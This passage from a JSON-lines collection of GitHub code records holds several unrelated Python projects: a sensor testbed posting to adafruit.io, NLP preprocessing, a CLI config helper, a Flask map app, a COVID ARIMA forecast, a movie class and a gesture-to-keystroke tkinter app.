https://accounts.adafruit.com to find your username)\nADAFRUIT_IO_USERNAME = 'xxxxx'\n\n# Create an instance of the REST client.\nAIO = Client(ADAFRUIT_IO_USERNAME, ADAFRUIT_IO_KEY)\n\n# Access or create the data feeds to adafruit.io\ntry:\n TEMPERATURE_SI7021_FEED = AIO.feeds(\"testsi7021temperature\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testsi7021temperature\")\n TEMPERATURE_SI7021_FEED = AIO.create_feed(FEED)\n\ntry:\n HUMIDITY_SI7021_FEED = AIO.feeds(\"testsi7021humidity\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testsi7021humidity\")\n HUMIDITY_SI7021_FEED = AIO.create_feed(FEED)\n\ntry:\n TEMPERATURE_DHT22_FEED = AIO.feeds(\"testdht22temperature\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testdht22temperature\")\n TEMPERATURE_DHT22_FEED = AIO.create_feed(FEED)\n\ntry:\n HUMIDITY_DHT22_FEED = AIO.feeds(\"testdht22humidity\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testdht22humidity\")\n HUMIDITY_DHT22_FEED = AIO.create_feed(FEED)\n\ntry:\n TEMPERATURE_MPL115A2_FEED = AIO.feeds(\"testmpl115a2temperature\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testmpl115a2temperature\")\n TEMPERATURE_MPL115A2_FEED = AIO.create_feed(FEED)\n\ntry:\n PRESSURE_MPL115A2_FEED = AIO.feeds(\"testmpl115a2pressure\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testmpl115a2pressure\")\n PRESSURE_MPL115A2_FEED = AIO.create_feed(FEED)\n\ntry:\n TEMPERATURE_BME680_FEED = AIO.feeds(\"testbme680temperature\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testbme680temperature\")\n TEMPERATURE_BME680_FEED = AIO.create_feed(FEED)\n\ntry:\n PRESSURE_BME680_FEED = AIO.feeds(\"testbme680pressure\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testbme680pressure\")\n PRESSURE_BME680_FEED = AIO.create_feed(FEED)\n\ntry:\n HUMIDITY_BME680_FEED = AIO.feeds(\"testbme680humidity\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testbme680humidity\")\n HUMIDITY_BME680_FEED = AIO.create_feed(FEED)\n\ntry:\n GAS_BME680_FEED = AIO.feeds(\"testbme680gas\")\nexcept RequestError: # Doesn't exist, create a new feed\n FEED = Feed(name=\"testbme680gas\")\n GAS_BME680_FEED = AIO.create_feed(FEED)\n\n# Access the Si7021 sensor\nSI7021_SENSOR = Si7021(SMBus(1))\n\n# Access the DHT22 
device driver using pin 4\nDHT_SENSOR = Adafruit_DHT.DHT22\nDHT_PIN = 4\n\n# Access the MPL115A2 device driver using I2C bus\nI2C = busio.I2C(board.SCL, board.SDA)\nMPL_SENSOR = adafruit_mpl115a2.MPL115A2(I2C)\n\n# Access and setup the BME680 sensor\ntry:\n BME680_SENSOR = bme680.BME680(bme680.I2C_ADDR_PRIMARY)\nexcept IOError:\n BME680_SENSOR = bme680.BME680(bme680.I2C_ADDR_SECONDARY)\n\nBME680_SENSOR.set_humidity_oversample(bme680.OS_2X)\nBME680_SENSOR.set_pressure_oversample(bme680.OS_4X)\nBME680_SENSOR.set_temperature_oversample(bme680.OS_8X)\nBME680_SENSOR.set_filter(bme680.FILTER_SIZE_3)\nBME680_SENSOR.set_gas_status(bme680.ENABLE_GAS_MEAS)\nBME680_SENSOR.set_gas_heater_temperature(320)\nBME680_SENSOR.set_gas_heater_duration(150)\nBME680_SENSOR.select_gas_heater_profile(0)\n\ndef celsius_to_fahrenheit(celsius):\n \"\"\" convert celsius to fahrenheit \"\"\"\n fahrenheit = (celsius * (9.0/5.0)) + 32.0\n return fahrenheit\n\ndef pressure_to_kpa(pressure):\n \"\"\" convert 1000 Pa to kpi \"\"\"\n kpa = pressure / 10.0\n return kpa\n\n# send temperature and humidity to adafruit.io\nwhile True:\n\n # collect and post data once per minute\n time.sleep(45.0)\n\n # SI7021 sensor data\n HUMIDITY, CELSIUS = SI7021_SENSOR.read()\n VALUE = celsius_to_fahrenheit(CELSIUS)\n AIO.send_data(TEMPERATURE_SI7021_FEED.key, VALUE)\n AIO.send_data(HUMIDITY_SI7021_FEED.key, HUMIDITY)\n\n time.sleep(5.0) # delay between posts\n # DHT22 sensor data\n HUMIDITY, CELSIUS = Adafruit_DHT.read_retry(DHT_SENSOR, DHT_PIN)\n if HUMIDITY is not None and CELSIUS is not None:\n VALUE = celsius_to_fahrenheit(CELSIUS)\n AIO.send_data(TEMPERATURE_DHT22_FEED.key, VALUE)\n AIO.send_data(HUMIDITY_DHT22_FEED.key, HUMIDITY)\n\n time.sleep(5.0) # delay between posts\n # MPL115A2 sensor data\n CELSIUS = MPL_SENSOR.temperature\n VALUE = celsius_to_fahrenheit(CELSIUS)\n AIO.send_data(TEMPERATURE_MPL115A2_FEED.key, VALUE)\n PRESSURE = MPL_SENSOR.pressure\n VALUE = pressure_to_kpa(PRESSURE)\n AIO.send_data(PRESSURE_MPL115A2_FEED.key, VALUE)\n\n time.sleep(5.0) # delay between posts\n # BME680 sensor data\n if BME680_SENSOR.get_sensor_data():\n CELSIUS = BME680_SENSOR.data.temperature\n VALUE = celsius_to_fahrenheit(CELSIUS)\n AIO.send_data(TEMPERATURE_BME680_FEED.key, VALUE)\n PRESSURE = BME680_SENSOR.data.pressure\n VALUE = pressure_to_kpa(PRESSURE)\n AIO.send_data(PRESSURE_BME680_FEED.key, VALUE)\n HUMIDITY = BME680_SENSOR.data.humidity\n AIO.send_data(HUMIDITY_BME680_FEED.key, HUMIDITY)\n if BME680_SENSOR.data.heat_stable:\n GAS = BME680_SENSOR.data.gas_resistance\n AIO.send_data(GAS_BME680_FEED.key, GAS)\n","repo_name":"parttimehacker/sensor-testbed","sub_path":"testbed.py","file_name":"testbed.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33108319228","text":"from constants import *\nfrom utils import *\nfrom nltk.tokenize import TweetTokenizer\n# from nltk import pos_tag\nfrom collections import Counter\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.decomposition import PCA\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef build_docs_vocab():\n if os.path.exists(OUTPUT_VOCAB_PATH):\n print(\"Vocab exists in {}\".format(OUTPUT_VOCAB_PATH))\n return load_text_as_list(OUTPUT_VOCAB_PATH)\n input_valid_docs = read_json(\"data/pod/meta/train_test.json\")[\"train\"]\n tokenizer = TweetTokenizer()\n corpus = []\n for file_name 
in tqdm(os.listdir(OUTPUT_DOC_DIR), \"Building vocabulary\"):\n doc_id = file_name[:-5]\n if doc_id in input_valid_docs:\n doc_data = read_json(os.path.join(OUTPUT_DOC_DIR, file_name))\n for post in doc_data.values():\n tokens = [t for t in tokenizer.tokenize(post[\"t\"].lower()) if t not in EXCLUDED_WORDS]\n corpus.extend(tokens)\n word_count = Counter(corpus).most_common(MAX_VOCAB_SIZE)\n vocab = [w[0] for w in word_count if w[1] >= MIN_VOCAB_COUNT]\n save_list_as_text(vocab, OUTPUT_VOCAB_PATH)\n print(\"Create vocab at {}\".format(OUTPUT_VOCAB_PATH))\n return vocab\n\n\ndef build_docs_users():\n if os.path.exists(OUTPUT_USER_PATH):\n print(\"Users exists in {}\".format(OUTPUT_USER_PATH))\n return load_text_as_list(OUTPUT_USER_PATH)\n user_corpus = []\n for file_name in tqdm(os.listdir(OUTPUT_DOC_DIR), \"Building users\"):\n doc_data = read_json(os.path.join(OUTPUT_DOC_DIR, file_name))\n for post in doc_data.values():\n user_corpus.append(post[\"a\"])\n word_count = Counter(user_corpus).most_common(MAX_USER_SIZE)\n users = [w[0] for w in word_count if w[1] >= MIN_USER_COUNT]\n save_list_as_text(users, OUTPUT_USER_PATH)\n return users\n\n\ndef build_expertise_vectors():\n if os.listdir(OUTPUT_USER_PCA_DIR):\n print(\"User expertise exists in {}\".format(OUTPUT_USER_PCA_DIR))\n return\n users = build_docs_users()\n user_participated_se_map = read_json(OUTPUT_USER_PARTICIPATED_SE_MAP_PATH)\n\n user_ses_list = [user_participated_se_map[user] if user in user_participated_se_map else []\n for user in users]\n mlb = MultiLabelBinarizer()\n user_one_hot_mtx = mlb.fit_transform(user_ses_list)\n\n print(\"Fit scaler\")\n scaler = MinMaxScaler()\n scaler_batch_size = 1024\n i = 0\n while i < len(user_one_hot_mtx):\n scaler.partial_fit(user_one_hot_mtx[i: i + scaler_batch_size])\n i += scaler_batch_size\n scaled_user_embedding = []\n i = 0\n while i < len(user_one_hot_mtx):\n scaled_user_embedding_batch = scaler.transform(user_one_hot_mtx[i: i + scaler_batch_size])\n scaled_user_embedding.extend(scaled_user_embedding_batch)\n i += scaler_batch_size\n unk_user_embedding = np.zeros(len(scaled_user_embedding[0]))\n scaled_user_embedding = np.vstack([unk_user_embedding] + scaled_user_embedding)\n\n for num_components in tqdm(range(5, 300, 5), desc=\"Building PCA for user expertise\"):\n pca = PCA(n_components=num_components)\n reduced_user_embedding = pca.fit_transform(scaled_user_embedding)\n save_to_pickle(reduced_user_embedding, OUTPUT_USER_PCA_RESULT_PATH.format(num_components))\n save_to_pickle(pca, OUTPUT_USER_PCA_PATH.format(num_components))\n\n\ndef plot_explained_variance():\n pca_data = []\n for file_name in os.listdir(OUTPUT_USER_PCA_DIR):\n if file_name.startswith(\"pca\"):\n pca = load_from_pickle(os.path.join(OUTPUT_USER_PCA_DIR, file_name))\n explained_variance = pca.explained_variance_ratio_\n summed_explained_variance = np.sum(explained_variance)\n pca_data.append((pca.n_components_, summed_explained_variance))\n\n sorted_pca_data = sorted(pca_data, key=lambda x: x[0])\n percentage_explained_var_list = [x[1] * 100 for x in sorted_pca_data]\n\n num_component_list = [x[0] for x in sorted_pca_data]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(num_component_list, percentage_explained_var_list, 'b*-')\n ax.set_ylim((0, 100))\n plt.grid(True)\n plt.xlabel('Number of principle components')\n plt.ylabel('Percentage of variance explained (%)')\n plt.savefig(\"pca.png\")\n\n\ndef analyse_all_class_distribution():\n doc_ses = read_json(OUTPUT_DOC_SE_MAP_PATH)\n train_test_path = 
os.path.join(OUTPUT_META_DIR, \"train_test.json\")\n train_test = read_json(train_test_path)\n standard_se_map = read_json(OUTPUT_STANDARD_SE_MAP_PATH)\n side_effects = set(standard_se_map.values())\n print(len(side_effects))\n train_docs = train_test[\"train\"]\n val_docs = train_test[\"val\"]\n test_docs = train_test[\"test\"]\n print(\"Train\")\n analyse_class_distribution(doc_ses, train_docs, side_effects)\n print(\"Val\")\n analyse_class_distribution(doc_ses, val_docs, side_effects)\n print(\"Test\")\n analyse_class_distribution(doc_ses, test_docs, side_effects)\n\n\ndef analyse_class_distribution(doc_ses, docs, side_effects, k=5):\n class_corpus = []\n [class_corpus.extend(doc_ses[doc]) for doc in docs]\n class_counter = Counter(class_corpus).most_common()\n class_percentage = [(cls, cnt/len(docs)) for cls, cnt in class_counter]\n all_classes = set([x[0] for x in class_counter])\n top_k_classes = class_percentage[:k]\n bottom_k_classes = class_percentage[::-1][:k]\n missing_classes = side_effects.difference(all_classes)\n print(\"Top {} classes: \".format(top_k_classes))\n print(\"Bottom {} classes: \".format(bottom_k_classes))\n print(\"Missing classes: {}, {}\".format(missing_classes, len(missing_classes)))\n\n\nNEG = \"NEG\"\nFCONJ = \"FCONJ\"\nCCONJ = 'CCONJ'\nICONJ = 'ICONJ'\nSMODAL = 'SMODAL'\nWMODAL = 'WMODAL'\nCOND = 'COND'\nADVERB = 'ADVERB'\nADJECTIVE = 'ADJECTIVE'\nPNOUN = 'PNOUN'\nCNOUN = 'CNOUN'\nFPERSON = 'FPERSON'\nSPERSON = 'SPERSON'\nTPERSON = 'TPERSON'\nDDET = 'DDET'\nIDET = 'IDET'\nOTHER = 'OTHER'\n\nALL_TAGS = [NEG, FCONJ, CCONJ, ICONJ, SMODAL, WMODAL, COND, ADVERB, ADJECTIVE,\n PNOUN, CNOUN, FPERSON, SPERSON, TPERSON, DDET, IDET, OTHER]\nTAG2IDX = {tag: i for i, tag in enumerate(ALL_TAGS)}\n\n\ndef classify_pos_tag(token, tag):\n if token in [\"no\", \"not\", \"neither\", \"nor\", \"never\"]:\n return NEG\n if token in [\"but\", \"however\", \"nevertheless\", \"otherwise\", \"yet\", \"still\", \"nonetheless\"]:\n return FCONJ\n if token in [\"till\", \"until\", \"despite\", \"inspite\", \"though\", \"although\"]:\n return CCONJ\n if token in [\"therefore\", \"furthermore\", \"consequently\", \"thus\", \"as\", \"subsequently\", \"eventually\", \"hence\"]:\n return ICONJ\n if token in [\"might\", \"could\", \"can\", \"would\", \"may\"]:\n return SMODAL\n if token in [\"should\", \"ought\", \"need\", \"shall\", \"will\", \"must\"]:\n return WMODAL\n if token in [\"if\"]:\n return COND\n if tag[:2] == \"RB\":\n return ADVERB\n if tag[:2] == \"JJ\":\n return ADJECTIVE\n if tag in [\"NNP\", \"NNPS\"]:\n return PNOUN\n if tag in [\"NN\", \"NNS\"]:\n return CNOUN\n if token in [\"i\", \"we\", \"me\", \"us\", \"my\", \"mine\", \"our\", \"ours\"]:\n return FPERSON\n if token in [\"you\", \"your\", \"yours\"]:\n return SPERSON\n if token in [\"he\", \"she\", \"him\", \"her\", \"his\", \"it\", \"its\", \"hers\", \"they\", \"them\", \"their\", \"theirs\"]:\n return TPERSON\n if tag[:2] == \"DT\" and token[:2] == \"th\":\n return DDET\n elif tag[:2] == \"DT\":\n return IDET\n return OTHER\n\n\n# def pos_tag_post(post_tokens):\n# tagged_tokens = pos_tag(post_tokens)\n# return [classify_pos_tag(token, tag) for token, tag in tagged_tokens]\n#\n#\n# def build_style_vector():\n# if os.path.exists(OUTPUT_USER_STYLE_MATRIX_PATH):\n# print(\"User style matrix exists in {}\".format(OUTPUT_USER_STYLE_MATRIX_PATH))\n# return load_from_pickle(OUTPUT_USER_STYLE_MATRIX_PATH)\n# input_valid_docs = read_json(\"data/pod/meta/train_test.json\")[\"train\"]\n# all_users = build_docs_users()\n# 
tokenizer = TweetTokenizer()\n# user_style_corpus = {}\n# for file_name in tqdm(os.listdir(OUTPUT_DOC_DIR), \"Building user style vector\"):\n# doc_id = file_name.replace(\".json\", \"\")\n# if doc_id in input_valid_docs:\n# doc_data = read_json(os.path.join(OUTPUT_DOC_DIR, file_name))\n# for post in doc_data.values():\n# tokens = [t for t in tokenizer.tokenize(post[\"t\"].lower()) if t not in EXCLUDED_WORDS]\n# user = post[\"a\"]\n# styles = pos_tag_post(tokens)\n# if user not in user_style_corpus:\n# user_style_corpus[user] = []\n# user_style_corpus[user].extend(styles)\n# user_style_mtx = []\n# for user in all_users:\n# user_style_vector = np.zeros(len(ALL_TAGS))\n# if user in user_style_corpus:\n# style_corpus = user_style_corpus[user]\n# corpus_size = len(style_corpus)\n# style_count = Counter(style_corpus).most_common()\n# for style, cnt in style_count:\n# user_style_vector[TAG2IDX[style]] += (float(cnt) / corpus_size)\n# user_style_mtx.append(user_style_vector)\n# unk_user_embedding = np.zeros(len(ALL_TAGS))\n# user_style_mtx = np.vstack([unk_user_embedding] + user_style_mtx)\n# save_to_pickle(user_style_mtx, OUTPUT_USER_STYLE_MATRIX_PATH)\n# min_max_scaler = MinMaxScaler()\n# user_style_mtx = min_max_scaler.fit_transform(user_style_mtx)\n# return user_style_mtx\n\n\nif __name__ == \"__main__\":\n build_docs_vocab()\n build_docs_users()\n build_expertise_vectors()\n # build_style_vector()\n plot_explained_variance()\n # analyse_all_class_distribution()\n","repo_name":"nguyenvanhoang7398/NEAT","sub_path":"preprocessing_data.py","file_name":"preprocessing_data.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40581865373","text":"from zpy.files import to_pathlib_path\nimport os\nimport yaml\n\nENDPOINT = \"https://ragnarok.zumok8s.org\"\nCONFIG_FILE = \"~/.zpy/config.yaml\"\n\n\ndef initialize_config():\n \"\"\"initialize config\n\n If CONFIG_FILE doesnt exist write it and put in prod as the endpoint. Also creates\n the ~/.zpy folder if not existing. 
The config is some variables needed by the cli to\n make validated requests to the backend.\n \"\"\"\n path = to_pathlib_path(os.path.expanduser(CONFIG_FILE))\n if path.exists():\n return\n CONFIG = {\"ENVIRONMENT\": \"prod\", \"TOKEN\": None, \"ENDPOINT\": ENDPOINT}\n path.parent.mkdir(parents=True, exist_ok=True)\n write_config(CONFIG)\n\n\ndef read_config(file=CONFIG_FILE):\n \"\"\"read config\n\n Read zpy cli configuration file.\n\n Args:\n env: which enviroment to read config for\n Returns:\n config: dictionary of current configuration\n \"\"\"\n path = to_pathlib_path(os.path.expanduser(file))\n with path.open() as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n return config\n\n\ndef write_config(config, file=CONFIG_FILE):\n \"\"\"write config\n\n Write zpy cli configuration file.\n\n Args:\n config (dict): new configuration to write\n \"\"\"\n path = to_pathlib_path(os.path.expanduser(file))\n with path.open(\"w\") as f:\n yaml.dump(config, f)\n\n\ndef add_env(name, endpoint):\n \"\"\"add environment\n\n Add a new environment configuration file.\n\n Args:\n name: name of the environment\n endpoint: endpoint for the new enviroment\n \"\"\"\n new_config = {\"ENVIRONMENT\": name, \"TOKEN\": None, \"ENDPOINT\": endpoint}\n write_config(new_config, file=f\"~/.zpy/{name}.yaml\")\n\n\ndef swap_env(name):\n \"\"\"swap environment\n\n Swap the current environment configuration.\n\n Args:\n name: swap to this env\n \"\"\"\n old_config = read_config()\n new_config = read_config(file=f\"~/.zpy/{name}.yaml\")\n write_config(new_config)\n write_config(old_config, file=f\"~/.zpy/{old_config['ENVIRONMENT']}.yaml\")\n","repo_name":"ZumoLabs/zpy","sub_path":"cli/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"37"} +{"seq_id":"17383902705","text":"'''\nThe module creates UI using flask.\n'''\n\nfrom flask import Flask, render_template, request\nfrom geopy.geocoders import Nominatim\nfrom folium_map import create_map\nfrom api import api_file_retriever\n\napp = Flask(__name__)\n\napp.config['TEMPLATES_AUTO_RELOAD'] = True\n\n@app.route('/')\ndef index():\n '''\n Returns main template of the site.\n '''\n return render_template('index.html')\n\n@app.route('/submit', methods = ['POST'])\ndef submit():\n '''\n Returns a site for navigation\nin the file.\n '''\n if not request.form.get('submission_user_name'):\n return render_template('error.html')\n\n geolocator = Nominatim(user_agent = 'JsonMaps')\n user_name = request.form.get('submission_user_name')\n try:\n friends_json = api_file_retriever(user_name)\n except:\n return render_template('error.html')\n\n locations = []\n names = []\n lenght = 0\n for friend in friends_json['users']:\n if lenght == 5:\n break\n coordinates = geolocator.geocode(friend['location'], exactly_one=True)\n if coordinates is None:\n continue\n locations.append(coordinates)\n names.append(friend['screen_name'])\n lenght += 1\n\n create_map(zip(locations, names))\n\n return render_template('map/JSON_map.html')\n\n@app.route('/get_back', methods = ['POST'])\ndef get_back():\n '''\n Returns a main site template.\n '''\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"normangalt/json_map","sub_path":"flask_ui.py","file_name":"flask_ui.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
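The swap_env helper in the zpy config record above performs a two-file swap: the requested environment's YAML file becomes the active ~/.zpy/config.yaml, and the previously active config is written back under its own environment name. A minimal round-trip sketch using those helpers; the "staging" name and endpoint URL are made-up values for illustration, not real zpy environments:

```python
# Hypothetical usage of add_env/swap_env/read_config defined above.
add_env("staging", "https://staging.example.org")  # writes ~/.zpy/staging.yaml

swap_env("staging")  # staging.yaml -> config.yaml; old config saved as prod.yaml
assert read_config()["ENDPOINT"] == "https://staging.example.org"

swap_env("prod")     # restore the original prod configuration
assert read_config()["ENVIRONMENT"] == "prod"
```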
+{"seq_id":"22773293339","text":"#!/usr/bin/python3\n\nimport os\nimport json\nimport pandas as pd\nimport pmdarima as pm\nimport datetime\n\n\nfileDir = os.getcwd()\n\nwith open(fileDir + '/covidDict.json') as f:\n data = json.load(f)\n\ndateFormat = '%Y-%m-%d'\n\n# Set forecast day count\nforecastDays = 5\n\n# Delete Serbia's data for now. It's recovery data needs correction.\ndel data['Serbia']\n\ncollectDeleteCountries = []\n\n# Loop countries to create forecast data\nfor country in data:\n tempArray = [['Date', 'Confirmed', 'Recovered', 'Deaths']]\n for d in data[country]['data']:\n if data[country]['data'][d]['confirmed'] > 0:\n tempArray.append([d, data[country]['data'][d]['confirmed'], data[country]['data'][d]['recovered'], data[country]['data'][d]['deaths']])\n\n lastDay = d\n\n # If data is less than 10 days, drop the country data for now\n if len(tempArray) < 11:\n collectDeleteCountries.append(country)\n continue\n\n lastDay = datetime.datetime.strptime(lastDay, dateFormat)\n\n df = pd.DataFrame(tempArray[1:])\n df.columns = tempArray[0]\n\n df['Date']=pd.to_datetime(df['Date'])\n df.set_index('Date', inplace=True)\n\n # Forecast next 7 days for confirmed\n confirmed_model = pm.auto_arima(df['Confirmed'], start_p=1, start_q=1, max_p=3, max_q=3, start_P=0, seasonal=False, d=2, trace=True, error_action='ignore', suppress_warnings=True, stepwise=True)\n\n confirmed_model.fit(df['Confirmed'])\n\n forecast_confirmed = confirmed_model.predict(n_periods=forecastDays)\n\n # Forecast next 7 days for recovered\n recovered_model = pm.auto_arima(df['Recovered'], start_p=1, start_q=1, max_p=3, max_q=3, start_P=0, seasonal=False, d=2, trace=True, error_action='ignore', suppress_warnings=True, stepwise=True)\n\n recovered_model.fit(df['Recovered'])\n\n forecast_recovered = recovered_model.predict(n_periods=forecastDays)\n\n # Forecast next 7 days for deaths\n deaths_model = pm.auto_arima(df['Deaths'], start_p=1, start_q=1, max_p=3, max_q=3, start_P=0, seasonal=False, d=2, trace=True, error_action='ignore', suppress_warnings=True, stepwise=True)\n\n deaths_model.fit(df['Deaths'])\n\n forecast_deaths = deaths_model.predict(n_periods=forecastDays)\n\n for i in range (len(forecast_confirmed)):\n lastDay = lastDay + datetime.timedelta(days=1)\n data[country]['data'][str(lastDay.date())] = {\n 'confirmed': int(round(forecast_confirmed[i])),\n 'recovered': int(round(forecast_recovered[i])),\n 'deaths': int(round(forecast_deaths[i])),\n }\n\n\n# If data is less than 10 days, drop the country data for now\nfor c in collectDeleteCountries:\n del data[c]\n\ncountryList = []\nfor key in data.keys():\n countryList.append(data[key])\n\n\ndailyGeneralData = {}\nfor key in data.keys():\n for dayDate in data[key][\"data\"]:\n dayObj = {x: data[key][\"data\"][dayDate][x] for x in data[key][\"data\"][dayDate].keys()}\n dayObj.update({\"date\": dayDate})\n\n if dayDate in dailyGeneralData:\n dailyGeneralData[dayDate][\"confirmed\"] += data[key][\"data\"][dayDate][\"confirmed\"]\n dailyGeneralData[dayDate][\"recovered\"] += data[key][\"data\"][dayDate][\"recovered\"]\n dailyGeneralData[dayDate][\"deaths\"] += data[key][\"data\"][dayDate][\"deaths\"]\n else:\n dailyGeneralData[dayDate] = dayObj\n\n\ndailyGeneralDataList = []\nfor key in dailyGeneralData.keys():\n dailyGeneralDataList.append(dailyGeneralData[key])\n\n\nwith open('covidDictForecast.json', 'w') as jsonFile:\n json.dump(data, jsonFile)\n\nwith open('covidForecast.json', 'w') as jsonFile:\n json.dump(countryList, jsonFile)\n\nwith 
open('graphForecast.json', 'w') as jsonFile:\n json.dump(dailyGeneralDataList, jsonFile)\n\nlastUpdated = {\"lastUpdated\": datetime.datetime.utcnow().strftime(\"%d/%m/%Y %H:%M:%S\") + \" UTC\"}\nwith open('updated.json', 'w') as jsonFile:\n json.dump(lastUpdated, jsonFile)\n","repo_name":"stfurkan/pancovid19","sub_path":"python/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"72745004908","text":"import webbrowser\n\n\nclass Movie():\n \"\"\" A class for movie objects\"\"\"\n\n def __init__(self,\n movie_title,\n movie_storyline,\n trailer_url,\n movie_poster,\n movie_ratings):\n \"\"\" Creates a new instance of the class\"\"\"\n self.title = movie_title\n self.storyline = movie_storyline\n self.trailer_youtube_url = trailer_url\n self.poster_image_url = movie_poster\n self.ratings = movie_ratings\n\n def play_trailer(self):\n \"\"\"This function plays the trailer from a URL\"\"\"\n webbrowser.open(self.trailer_youtube_url)\n\n def show_poster(self):\n \"\"\"This function shows the poster from a URL\"\"\"\n webbrowser.open(self.poster_image_url)\n","repo_name":"bani890/movie_review_py","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36019383330","text":"from tkinter import *\nfrom PIL import ImageTk, Image\nfrom pathlib import Path\nimport pyautogui\nimport os\nimport cv2\nimport numpy as np\nimport mediapipe as mp\nfrom tensorflow.keras.models import load_model\nfrom time import sleep\nimport threading\nimport datetime\nimport json\n\nroot = Tk()\nroot.title(\"Gesture Control\")\n\n###################\n## Settings ##\n###################\n\nframe_setting = LabelFrame(root, text = \"Settings\", width = 780, pady=5)\nframe_setting.grid(row=0, column=0)\n\n# We divide the frame into a 26 column grid\nfor i in range(26):\n frame_setting.columnconfigure(i,{'minsize':30})\n\n# Stay on top check box\ncheckbox_stay_top = BooleanVar()\n\ndef stay_on_top():\n global checkbox_stay_top\n if checkbox_stay_top.get():\n root.attributes('-topmost',True)\n else:\n root.attributes('-topmost',False)\n\nCheckbutton(frame_setting, text=\"Always stay on top (Windows)\", variable=checkbox_stay_top, onvalue=True, offvalue=False, command=stay_on_top).grid(row=0, column = 1, columnspan=10, pady = 5, sticky=W)\n\n# Sleep Interval\nsleep_interval = Entry(frame_setting, width=3)\nsleep_interval.grid(row=1, column=1, pady = 5)\nlabel_sleep_interval = Label(frame_setting, text = \"Sleep interval between gestures' action in seconds\").grid(row=1, column=2, columnspan=10,pady=10, sticky=W)\n\n# About info\nlabel_about1 = Label(frame_setting, text=\"Developed by erjieyong@gmail.com\", font=\"Serif 7\").grid(row=0, column = 20, columnspan=5, pady = 5, sticky=E)\n\n# Column labels\nlabel_gesture_name = Label(frame_setting, text = \"Name\", font=\"bold 10\").grid(row=2, column=1, columnspan=2)\nlabel_gestures = Label(frame_setting, text = \"Gestures\", font=\"bold 10\").grid(row=2, column=4, columnspan=2)\nlabel_keystroke = Label(frame_setting, text = \"Keystroke Assignment\", font=\"bold 10\").grid(row=2, column=7, columnspan=5)\n\nlabel_gesture_name = Label(frame_setting, text = \"Name\", font=\"bold 10\").grid(row=2, column=14, columnspan=2)\nlabel_gestures = Label(frame_setting, text = \"Gestures\", font=\"bold 10\").grid(row=2, column=17, 
columnspan=2)\nlabel_keystroke = Label(frame_setting, text = \"Keystroke Assignment\", font=\"bold 10\").grid(row=2, column=21, columnspan=5)\n\n# Get all gestures from folder\nimages_gen = Path(\"./Images\").glob(\"*.png\")\nimages = [str(img) for img in images_gen]\nimages_name = [str(img)[7:-4] for img in images]\n\n# Display gestures. We need to store the image in a dict otherwise it will be garbage collected\ngesture_img_dict = {'name':{}, 'img':{}, 'keystroke':{}}\nkeystroke_list = ['accept', 'add', 'alt', 'altleft', 'altright', 'apps', 'backspace',\n'browserback', 'browserfavorites', 'browserforward', 'browserhome',\n'browserrefresh', 'browsersearch', 'browserstop', 'capslock', 'clear',\n'convert', 'ctrl', 'ctrlleft', 'ctrlright', 'decimal', 'del', 'delete',\n'divide', 'down', 'end', 'enter', 'esc', 'escape', 'execute', 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10', 'f11', 'f12',\n'final', 'fn', 'hanguel', 'hangul', 'hanja', 'help', 'home', 'insert', 'junja',\n'kana', 'kanji', 'launchapp1', 'launchapp2', 'launchmail',\n'launchmediaselect', 'left', 'modechange', 'multiply', 'nexttrack',\n'nonconvert', 'num0', 'num1', 'num2', 'num3', 'num4', 'num5', 'num6',\n'num7', 'num8', 'num9', 'numlock', 'pagedown', 'pageup', 'pause', 'pgdn',\n'pgup', 'playpause', 'prevtrack', 'print', 'printscreen', 'prntscrn',\n'prtsc', 'prtscr', 'return', 'right', 'scrolllock', 'select', 'separator',\n'shift', 'shiftleft', 'shiftright', 'sleep', 'space', 'stop', 'subtract', 'tab',\n'up', 'volumedown', 'volumemute', 'volumeup', 'win', 'winleft', 'winright', 'yen',\n'command', 'option', 'optionleft', 'optionright']\nfor i in range(5):\n # Set name\n gesture_img_dict['name'][i] = Label(frame_setting, text = images_name[i]).grid(row=i+3, column = 1, columnspan = 2)\n gesture_img_dict['name'][i+5] = Label(frame_setting, text = images_name[i+5]).grid(row=i+3, column = 14, columnspan = 2)\n # Set images into 2 separate columns\n gesture_img_dict['img'][i] = ImageTk.PhotoImage(Image.open(images[i]))\n gesture_img_dict['img'][i+5] = ImageTk.PhotoImage(Image.open(images[i+5]))\n Label(frame_setting, image = gesture_img_dict['img'][i]).grid(row = i+3, column = 4, columnspan=2)\n Label(frame_setting, image = gesture_img_dict['img'][i+5]).grid(row = i+3, column = 17, columnspan=2)\n # Set drop down list\n gesture_img_dict['keystroke'][i] = StringVar()\n gesture_img_dict['keystroke'][i+5] = StringVar()\n OptionMenu(frame_setting, 